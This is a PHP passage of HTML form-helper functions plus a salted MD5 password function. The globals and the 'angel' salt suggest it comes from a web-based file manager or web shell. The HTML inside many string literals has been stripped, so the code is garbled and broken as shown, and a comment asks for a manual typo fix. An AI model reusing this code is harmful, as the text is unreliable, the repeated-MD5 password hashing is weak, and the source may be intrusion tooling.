" ); } else { p( "$arg[title]" ); } } function makeselect( $arg = array() ) { if ( $arg['onchange'] ) { $onchange = 'onchange="' . $arg['onchange'] . '"'; } $arg['title'] = $arg['title'] ? $arg['title'] : ''; if ( $arg['newline'] ) { p( '

' ); } p( "$arg[title] " ); if ( $arg['newline'] ) { p( '

' ); } } function formhead( $arg = array() ) { global $self; ! $arg['method'] && $arg['method'] = 'post'; ! $arg['action'] && $arg['action'] = $self; $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : ''; ! $arg['name'] && $arg['name'] = 'form1'; p( "
" ); if ( $arg['title'] ) { p( '

' . $arg['title'] . ' »

' ); } } function maketext( $arg = array() ) { ! $arg['cols'] && $arg['cols'] = 100; ! $arg['rows'] && $arg['rows'] = 25; $arg['title'] = $arg['title'] ? $arg['title'] . '
' : ''; p( "

$arg[title]

" ); } function formfooter( $name = '' ) { ! $name && $name = 'submit'; p( '

' ); p( '
' ); } function goback() { global $self, $nowpath; p( '

' ); } function formfoot() { p( '' ); } function encode_pass( $pass ) { $pass = md5( 'angel' . $pass ); $pass = md5( $pass . 'angel' ); $pass = md5( 'angel' . $pass . 'angel' ); return $pass; } function pr( $s ) { echo "
" . print_r( $s ) . '';//此处prre请手动换成pre
}

?>